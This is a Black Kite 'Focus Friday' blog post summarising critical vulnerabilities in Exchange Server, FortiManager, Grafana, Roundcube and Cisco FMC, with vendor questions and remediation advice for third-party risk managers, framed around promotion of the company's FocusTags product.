Written by: Ferdi Gül

Welcome to this week’s edition of Focus Friday, where we explore high-profile cybersecurity incidents and vulnerabilities through the lens of Third-Party Risk Management (TPRM). In today’s rapidly evolving threat landscape, critical vulnerabilities pose a significant risk to organizations relying on third-party software and services. This week, we dive into several crucial vulnerabilities, including those affecting Exchange Server, FortiManager, Grafana, Roundcube Webmail, and Cisco FMC each with potentially severe impacts on businesses. By leveraging Black Kite’s FocusTags™, TPRM professionals can gain key insights and stay ahead of these evolving threats.

Filtered view of companies with Exchange Server RCE FocusTag™ on the Black Kite platform.

Critical Microsoft Exchange Server RCE Vulnerabilities

What are the Microsoft Exchange Server RCE Vulnerabilities?

The vulnerabilities impacting Microsoft Exchange Server, particularly CVE-2021-26855, are critical Remote Code Execution (RCE) issues. CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests and execute code on the target Exchange Server. Other vulnerabilities like CVE-2021-27065, CVE-2021-26858, and CVE-2021-26857 enable the attacker to install malicious programs and exfiltrate data. These vulnerabilities have a high EPSS score, with CVE-2021-26855 scoring 97.5%, indicating a significant likelihood of exploitation in the wild.

First discovered in early 2021, these vulnerabilities were rapidly exploited by various threat actors, including the Chinese-based group Salt Typhoon, targeting critical infrastructure. Exploits have allowed attackers to plant backdoors, steal sensitive data, and compromise systems. Microsoft and several security agencies, including CISA, have released advisories and urged immediate patching. CVE-2021-34473 and CVE-2021-31196 were added to CISA’s KEV catalog on August 21, 2024. 

The vulnerability was reported in the Wall Street Journal (WSJ) on October 11, 2024, and the details were later shared on the Chertoff Group website on October 18, 2024. Among the four CVEs we discussed (CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857), we included these in the FocusTag scope, which was tagged earlier this week by Black Kite’s Research & Intelligence Team (BRITE). Clients tagged under this FocusTag, who had previously taken precautions against CVE-2021-31196 and CVE-2021-34473, were protected from these four vulnerabilities as well. In addition to the above-mentioned group of four CVEs that were discussed in recent blogs, it is crucial for security personnel in organizations to remain vigilant regarding CVE-2021-31196 and CVE-2021-34473. We had previously mentioned CVE-2021-31196 and CVE-2021-34473 vulnerabilities in our August 23, 2024 Focus Friday post.

Why Should TPRM Professionals Be Concerned?

From a third-party risk management perspective, these vulnerabilities pose significant risks to organizations that rely on Microsoft Exchange Server for communication and operational functions. A successful attack on Exchange Servers can lead to full system compromise, allowing attackers to access sensitive emails, contacts, and other communications. Additionally, the compromised server can be leveraged for further attacks, potentially spreading malware or stealing additional data from third-party vendors. Given the widespread use of Exchange Servers in enterprise environments, the ripple effects of such a breach can be substantial, especially when considering the possibility of fraudulent emails being sent from compromised accounts.

What Questions Should TPRM Professionals Ask Vendors About These Vulnerabilities?

  1. Have you applied the latest security updates to all affected versions of Exchange Server (2019 CU1 to CU8, 2016 CU8 to CU19, 2013 CU22, CU23, SP1, and 2010 SP3) to mitigate the risk of CVE-2021-31196, CVE-2021-34473, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, and CVE-2021-26857?
  2. 2. Can you confirm if you have implemented strong security practices, including limiting access to the server, enabling multi-factor authentication, and regularly auditing access logs, to prevent potential exploitation of the Remote Code Execution (RCE) vulnerabilities in Microsoft Exchange Server?
  3. 3. Are you actively monitoring network traffic to and from Exchange Server for any unusual activity that may indicate exploitation attempts related to CVE-2021-31196, CVE-2021-34473, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, and CVE-2021-26857?
  4. 4. Given the critical nature of Exchange Server, have you undertaken proactive threat hunting to identify potential indicators of compromise related to the aforementioned CVEs?

Remediation Recommendations for Vendors

  • Apply the Latest Security Updates. Microsoft has released security updates to address this vulnerability. Ensure that all affected Exchange Server installations are updated to the latest cumulative updates as listed above.
  • Organizations are advised to prioritize patch management, strengthen authentication measures, and collaborate with ISPs to mitigate these evolving risks.
  • Implement Strong Security Practices. Ensure that Exchange Server is properly configured with strong security settings, including limiting access to the server, enabling multi-factor authentication, and regularly auditing access logs.
  • Consider Proactive Threat Hunting. Given the critical nature of Exchange Server, proactive threat hunting to identify potential indicators of compromise may be warranted.
  • Monitor Network Traffic. Regularly monitor network traffic to and from Exchange Server for any unusual activity that may indicate exploitation attempts.

How TPRM Professionals Can Leverage Black Kite for These Vulnerabilities

Black Kite provides a streamlined approach for identifying vendors at risk of these vulnerabilities. The Exchange Server RCE FocusTag enables TPRM professionals to pinpoint vendors who have vulnerable Microsoft Exchange Servers in their environment. Black Kite helps operationalize this information by providing detailed asset intelligence, including IP addresses and subdomains, linked to the vendors. With this level of insight, TPRM teams can prioritize outreach and remediation efforts, ensuring that only vendors with exposure to these vulnerabilities are addressed. Black Kite first published this tag in August 2024 and most recently updated it on October 23, 2024, with new threat intelligence related to Chinese state-sponsored threat actors.

Black Kite’s Exchange Server RCE FocusTagTM details critical insights on the event for TPRM professionals.

FortiManager: CVE-2024-47575 Missing Authentication Vulnerability

What is the FortiManager CVE-2024-47575 Vulnerability?

CVE-2024-47575 is a critical missing authentication vulnerability that affects FortiManager, a system used to manage Fortinet’s network security devices. This vulnerability, assigned a CVSS score of 9.8 and an EPSS score of 0.04%, was first identified in the wild on June 27, 2024. It allows unauthenticated attackers to execute arbitrary code or commands by exploiting the FortiManager fgfmd daemon via specially crafted requests. Both on-premise and cloud versions of FortiManager are impacted, making this vulnerability a significant threat. On October 23, 2024, this vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.

The vulnerability is actively exploited by the UNC5820 threat group, which has used it to steal configuration files, IP addresses, and credentials from FortiGate devices managed by FortiManager systems. This flaw poses a severe risk to organizations using FortiManager as it allows attackers to automate the exfiltration of sensitive information and potentially compromise their entire security infrastructure.

Why Should TPRM Professionals Be Concerned About the FortiManager Vulnerability?

Third-Party Risk Management (TPRM) professionals should be concerned because FortiManager is a critical tool for managing and securing network infrastructure. If compromised, attackers can gain access to sensitive configuration files and credentials for FortiGate devices, potentially leading to wider network breaches and unauthorized control of key network devices. The exposure of configuration details can lead to attackers disabling security defenses or manipulating device settings to bypass security measures. Additionally, the exploitation of this vulnerability could facilitate future attacks by providing attackers with the necessary information to escalate privileges or conduct lateral movements within the network.

As FortiManager is widely used by organizations to manage network security, the impact of this vulnerability could be devastating, particularly if sensitive information is exfiltrated and used to compromise other critical systems.

What Questions Should TPRM Professionals Ask Vendors About the FortiManager Vulnerability?

When assessing vendor exposure to CVE-2024-47575, TPRM professionals should ask:

  1. Has the vendor applied the latest firmware updates that address CVE-2024-47575?
  2. Are unregistered devices being blocked from connecting to the FortiManager system using the fgfm-deny-unknown configuration?
  3. Have all FortiGate device credentials been updated following the discovery of this vulnerability?
  4. Is the vendor actively monitoring FortiManager event logs for any suspicious activities, especially from unregistered devices like “localhost”?

Remediation Recommendations for Vendors subject to this risk

To mitigate the risks associated with CVE-2024-47575, vendors should:

  • Apply firmware updates immediately. Ensure all FortiManager installations are updated to the latest secure versions (7.6.1, 7.4.5, 7.2.8, 7.0.13, 6.4.15, or above).
  • Restrict device registrations by enabling fgfm-deny-unknown, which prevents unregistered devices from attempting to connect to FortiManager.
  • Implement IP restrictions to limit access only to trusted FortiGate devices through the config system local-in-policy.
  • Review FortiManager logs regularly for indicators of compromise (IoCs), including connections from unregistered devices or malicious IP addresses.

How Can TPRM Professionals Leverage Black Kite for This Vulnerability?

Black Kite published the FocusTag™ on October 23, 2024, identifying CVE-2024-47575 as a significant threat due to its active exploitation in the wild. TPRM professionals can operationalize this tag by using Black Kite’s insights to determine which of their vendors may be exposed to this vulnerability. Black Kite provides asset information such as IP addresses and subdomains that may be at risk, allowing organizations to pinpoint which vendors may need to implement remediation steps. This vulnerability was last updated in the tag with information about ongoing threat activity by the UNC5820 group, ensuring TPRM professionals stay informed as new details emerge.

Black Kite’s FortiManager FocusTagTM details critical insights on the event for TPRM professionals.

CVE-2024-9264 and Grafana RCE Vulnerability

What is the Grafana RCE Vulnerability?

CVE-2024-9264 is a critical Remote Code Execution (RCE) vulnerability affecting Grafana, a popular open-source platform used for monitoring and observability. This vulnerability has a CVSS score of 9.9, making it extremely severe, indicating lower immediate exploitation potential. First disclosed in October 2024, this vulnerability is linked to an experimental feature, SQL Expressions, which was enabled by default due to improper implementation of feature flags. Attackers can inject system commands through improperly sanitized SQL queries, which could lead to full system compromise if exploited successfully.

While the vulnerability has not yet been observed in widespread exploitation, the presence of the PoC raises concerns about the likelihood of future attacks. The exploitation depends on whether the DuckDB binary is present on the Grafana server. If DuckDB is manually installed, attackers could read sensitive files like “/etc/passwd” or retrieve environment variables, making the impact devastating. As of now, this vulnerability has not been added to CISA’s Known Exploited Vulnerabilities catalog.

Why Should TPRM Professionals Be Concerned?

From a TPRM perspective, CVE-2024-9264 presents serious risks to organizations using Grafana. Since Grafana is commonly deployed to monitor critical infrastructure, any compromise could lead to the exposure of sensitive data, such as operational logs or system configurations. Moreover, if an attacker gains control of the Grafana instance, they can potentially pivot to other parts of the network, launching further attacks. Given that any user with Viewer permissions can exploit this vulnerability, organizations using Grafana may unknowingly expose themselves to insider threats or unauthorized access by users with minimal privileges.

What Questions Should TPRM Professionals Ask Vendors About the Grafana RCE Vulnerability?

  1. Have you upgraded your Grafana instances to one of the patched versions (v11.0.5+security-01, v11.1.6+security-01, v11.2.1+security-01, v11.0.6+security-01, v11.1.7+security-01, v11.2.2+security-01) to mitigate the risk of CVE-2024-9264?
  2. Can you confirm if the DuckDB binary has been removed from the system’s PATH or uninstalled entirely to prevent exploitation of the CVE-2024-9264 vulnerability?
  3. Have you implemented measures to regularly review system logs for suspicious activity, specifically related to potential exploitation of the SQL Expressions feature in Grafana?
  4. Can you confirm if you have implemented proper access controls for users with Viewer permissions or higher to prevent unauthorized exploitation of the SQL Expressions feature in Grafana?

Remediation Recommendations for Vendors

  • Immediately upgrade Grafana to a patched version, such as v11.0.5+security-01, v11.1.6+security-01, or the latest v11.2.2+security-01, to prevent exploitation.
  • If a patch cannot be applied right away, remove or uninstall the DuckDB binary from the system to mitigate the risk.
  • Regularly audit system logs and monitor access control for any unusual activity involving Grafana users with Viewer permissions or higher.
  • Follow Grafana Labs’ security announcements for any additional updates or mitigations related to this vulnerability.

How Can TPRM Professionals Leverage Black Kite for This Vulnerability?

Black Kite helps TPRM professionals determine which vendors are vulnerable to this critical Grafana RCE vulnerability. The FocusTag™ for Grafana enables users to identify vendors who are potentially exposed by flagging related assets, including IP addresses and subdomains. With this actionable intelligence, TPRM teams can prioritize communications with affected vendors, ensuring timely remediation efforts. This tag was published by Black Kite in October 18, 2024, and ongoing updates are provided as new information becomes available.

Black Kite’s Grafana FocusTagTM details critical insights on the event for TPRM professionals.

CVE-2024-37383 and Roundcube Webmail XSS Vulnerability

What is the Roundcube Webmail XSS Vulnerability?

CVE-2024-37383 is a medium-severity Cross-Site Scripting (XSS) vulnerability impacting Roundcube Webmail. This vulnerability, with a CVSS score of 6.1 and an EPSS score of 0.05%, allows attackers to inject and execute arbitrary JavaScript code within the victim’s web browser. Discovered in October 2024, the flaw was exploited by unknown threat actors to steal user credentials by embedding malicious SVG animate attributes in emails. Once the victim opened the email, the embedded script exfiltrated login credentials to an external server. It’s currently not clear who is behind the exploitation activity, although prior flaws discovered in Roundcube have been abused by multiple hacking groups such as APT28, Winter Vivern, and TAG-70. After we tagged it, it was published in CISA’s Known Exploited Vulnerabilities (KEV) catalog on October 24, 2024.

Why Should TPRM Professionals Be Concerned?

From a TPRM perspective, this XSS vulnerability in Roundcube Webmail poses a significant risk to organizations that rely on this platform for email services. Exploitation of this vulnerability can lead to credential theft, allowing attackers to gain unauthorized access to sensitive accounts, potentially compromising email communications and exposing confidential information. Furthermore, the ability to execute malicious code via emails makes it a potent vector for phishing attacks, putting both vendors and their partners at risk. Email remains a critical component of most business operations, and any breach in this system can have far-reaching consequences, including reputational damage and regulatory scrutiny.

What Questions Should TPRM Professionals Ask Vendors About the Roundcube Webmail XSS Vulnerability?

  1. Have you updated your Roundcube Webmail instances to the patched versions (1.5.7 or 1.6.7) that address CVE-2024-37383?
  2. What measures have you implemented to detect and mitigate phishing attacks targeting email clients like Roundcube?
  3. Can you confirm if you have implemented email filtering tools to block malicious attachments and scripts within emails as recommended in the advisory?
  4. Have you enabled multi-factor authentication (MFA) on all critical systems to mitigate credential theft risks associated with this vulnerability?
  5. Have you reviewed your email logs for any suspicious login activities or interactions with known malicious domains, such as ‘libcdn[.]org’?

Remediation Recommendations for Vendors

  • Upgrade Roundcube Webmail to versions 1.5.7 or 1.6.7 to patch the XSS vulnerability and mitigate the risk of credential theft.
  • Educate employees on how to identify and avoid phishing emails, with an emphasis on recognizing suspicious attachments or links.
  • Implement multi-factor authentication (MFA) across all critical systems to reduce the likelihood of unauthorized access through stolen credentials.
  • Conduct a thorough audit of Roundcube logs for any indicators of compromise (IoCs) related to this vulnerability or phishing attacks.
  • Use email filtering tools to block potentially malicious content, such as scripts or SVG files, embedded within emails.

How Can TPRM Professionals Leverage Black Kite for This Vulnerability?

Black Kite’s FocusTag™ for Roundcube Webmail enables TPRM professionals to identify vendors using vulnerable versions of Roundcube. By providing detailed asset information, including IP addresses and subdomains associated with vendors, Black Kite allows TPRM teams to target remediation efforts where they are most needed. This FocusTag was published on October 24, 2024, and ongoing updates are available to ensure that TPRM professionals stay informed about the latest exploitation trends and mitigations related to this vulnerability.

 Black Kite’s Roundcube Webmail FocusTagTM details critical insights on the event for TPRM professionals.

CVE-2024-20424 and Cisco FMC Command Injection Vulnerability

What is the Cisco FMC Command Injection Vulnerability?

CVE-2024-20424 is a critical command injection vulnerability in Cisco Secure Firewall Management Center (FMC) Software, with a CVSS score of 9.9. This vulnerability arises from insufficient input validation in the web-based management interface of the software. Exploiting this flaw allows authenticated remote attackers to execute arbitrary commands with root privileges, potentially compromising the entire system. The vulnerability was first disclosed in October 2024, and although no active exploitation has been reported yet, the critical nature of this flaw makes it a priority for patching.

Attackers could exploit this vulnerability using credentials from a low-privileged account, such as a Security Analyst (Read Only), to escalate privileges and run high-level commands. This could result in unauthorized modifications, malware installation, or disabling critical security defenses. While there is no PoC available yet, the risk posed by this vulnerability is significant, particularly for organizations heavily relying on Cisco FMC software for managing their firewalls.

Why Should TPRM Professionals Be Concerned?

For third-party risk management (TPRM) professionals, this vulnerability presents a significant risk to organizations using Cisco FMC software. Compromising this system would allow attackers to control network security policies, firewall settings, and other critical functions, leading to potential unauthorized access across the network. Cisco FMC is often used to manage firewalls, and any disruption or control takeover could result in network breaches, exposure of sensitive data, and operational disruption. The criticality of CVE-2024-20424 makes it essential for TPRM professionals to ensure that their vendors and partners using Cisco FMC have properly mitigated this vulnerability.

What Questions Should TPRM Professionals Ask Vendors About the Cisco FMC Command Injection Vulnerability?

  • Have you applied Cisco’s latest software updates that address CVE-2024-20424 and CVE-2024-20379 in Cisco FMC?
  • Can you confirm if you have restricted access to the web-based management interface of Cisco FMC Software to trusted users only, as a measure to prevent potential exploitation of CVE-2024-20424 and CVE-2024-20379?
  • Have you implemented multi-factor authentication (MFA) for user accounts, especially for low-level user accounts such as Security Analyst (Read Only), to prevent privilege escalation and execution of highly privileged commands as a result of CVE-2024-20424?
  • Are you monitoring network activity for unusual behavior indicative of potential exploitation of the command injection vulnerability (CVE-2024-20424) and the improper input validation vulnerability (CVE-2024-20379) in Cisco FMC Software?

Remediation Recommendations for Vendors

  • Immediately apply the latest software patches released by Cisco to address CVE-2024-20424 and CVE-2024-20379.
  • Implement multi-factor authentication (MFA) for all users accessing Cisco FMC to mitigate unauthorized access risks.
  • Restrict access to the Cisco FMC web-based management interface to trusted IP addresses and users only.
  • Regularly monitor network traffic and logs for any suspicious activity or indicators of compromise.
  • Follow Cisco’s official advisory for further instructions and guidance on securing Cisco FMC software.

How Can TPRM Professionals Leverage Black Kite for This Vulnerability?

Black Kite’s FocusTag™ for Cisco FMC provides a comprehensive view of which vendors are potentially exposed to these vulnerabilities. This tag allows TPRM professionals to pinpoint which of their third-party vendors or partners are using vulnerable Cisco FMC versions. By leveraging Black Kite’s asset intelligence, such as associated IP addresses and subdomains, TPRM teams can focus their remediation efforts on the vendors that pose the highest risk. Black Kite published this FocusTag on October 24, 2024, and it will be updated as new details or patches are released by Cisco.

Black Kite’s Cisco FMC FocusTagTM details critical insights on the event for TPRM professionals.

Maximizing TPRM Effectiveness with Black Kite’s FocusTags

Black Kite’s FocusTags™ are vital tools for enhancing Third-Party Risk Management strategies, offering targeted insights that help organizations mitigate risks more efficiently. These tags, especially when dealing with vulnerabilities in Exchange Server, FortiManager, Grafana, Roundcube Webmail, and Cisco FMC, provide:

  • Real-Time Risk Identification: Immediate recognition of vendors impacted by critical vulnerabilities, facilitating prompt and decisive action.
  • Risk Prioritization: By assessing vendor importance and vulnerability severity, TPRM professionals can focus on the most critical issues first, ensuring resources are used effectively.
  • Informed Vendor Engagement: Black Kite’s FocusTags™ empower organizations to hold informed, meaningful conversations with vendors about their security posture and remediation efforts, specifically addressing exposure to identified vulnerabilities.
  • Strengthened Cybersecurity Posture: These tags offer a comprehensive overview of the threat landscape, enabling organizations to enhance their overall cybersecurity strategies, improving their resilience against future threats.

By transforming complex threat data into actionable intelligence, Black Kite’s FocusTags™ streamline the risk management process, enabling TPRM professionals to respond swiftly to emerging vulnerabilities and ensure the safety of their third-party ecosystem.



Want to take a closer look at FocusTags™?


Take our platform for a test drive and request a demo today.




Request a Demo

About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • Exchange Server RCE: CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, Remote Code Execution Vulnerability in Exchange Server.
  • FortiManager: CVE-2024-47575, Missing Authentication Vulnerability in FortiManager.
  • Grafana: CVE-2024-9264, Remote Code Execution Vulnerability  in Grafana.
  • Roundcube Webmail: CVE-2024-37383, Cross-Site Scripting (XSS) Vulnerability in Roundcube Webmail.
  • Cisco FMC: CVE-2024-20424, Command Injection Vulnerability in Cisco Secure Firewall Management Center.
  • Oracle WebLogic Server: CVE-2024-21216, Remote Code Execution Vulnerability in Oracle WebLogic Server.
  • GitHub Enterprise: CVE-2024-9487, SAML SSO Authentication Bypass Vulnerability in GitHub Enterprise Server.
  • Fortinet Core Products: CVE-2024-23113, Format String Vulnerability in FortiOS, FortiPAM, FortiProxy, and FortiWeb. 
  • Cisco RV Routers: CVE-2024-20393, CVE-2024-20470, Privilege Escalation and RCE Vulnerability in RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. 
  • Ivanti Connect Secure: CVE-2024-37404, Remote Code Execution Vulnerability in Ivanti Connect Secure & Policy Secure.
  • Zimbra: CVE-2024-45519, Remote Command Execution Vulnerability in Zimbra.
  • DrayTek Routers: CVE-2020-15415, Remote Code Execution Vulnerability in DrayTek Vigor Routers.
  • Authentik: CVE-2024-47070, Authentication Bypass Vulnerability in Authentik.
  • Octopus Deploy: CVE-2024-9194, SQL Injection Vulnerability in Octopus Server.
  • pgAdmin: CVE-2024-9014, OAuth2 Authentication Vulnerability in pgAdmin.
  • Keycloak: CVE-2024-8698, CVE-2024-8883, SAML Signature Validation Bypass and Session Hijacking Vulnerability in Keycloak.
  • Navidrome: CVE-2024-47062, SQL Injection Vulnerability in Navidrome.
  • PAN-OS Cleartext: CVE-2024-8687, Cleartext Exposure Security Flaw in PAN-OS, GlobalProtect, Prisma Access.
  • FileCatalyst Workflow: CVE-2024-6633, CVE-2024-6632, Insecure Default Configuration and SQL Injection Vulnerability in Fortra FileCatalyst Workflow.
  • WPML: CVE-2024-6386, Critical Remote Code Execution Vulnerability via Twig Server-Side Template Injection in WPML Plugin
  • SonicWall Firewalls: CVE-2024-40766, Critical Improper Access Control Vulnerability in SonicWall Firewalls

References

https://www.wsj.com/politics/national-security/u-s-officials-race-to-understand-severity-of-chinas-salt-typhoon-hacks-6e7c3951

https://chertoffgroup.com/china-based-cyber-attacks-highlight-us-tech-vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2021-26855

https://nvd.nist.gov/vuln/detail/CVE-2021-27065

https://nvd.nist.gov/vuln/detail/CVE-2021-26858

https://nvd.nist.gov/vuln/detail/CVE-2021-26857

https://blackkite.com/blog/focus-friday-tprm-insights-into-critical-vulnerabilities-in-microsoft-windows-solarwinds-whd-zimbra-and-exchange-server

https://nvd.nist.gov/vuln/detail/CVE-2024-47575

https://fortiguard.fortinet.com/psirt/FG-IR-24-423

https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks

https://nvd.nist.gov/vuln/detail/CVE-2024-9264

https://github.com/nollium/CVE-2024-9264/tree/main

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264

https://grafana.com/security/security-advisories/cve-2024-9264

https://github.com/advisories/GHSA-q99m-qcv4-fpm7

https://nvd.nist.gov/vuln/detail/CVE-2024-37383

https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html

https://github.com/roundcube/roundcubemail/releases/tag/1.6.7

https://nvd.nist.gov/vuln/detail/CVE-2024-20424

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7

https://securityonline.info/cve-2024-20424-cvss-9-9-cisco-fmc-software-vulnerability-grants-attackers-root-access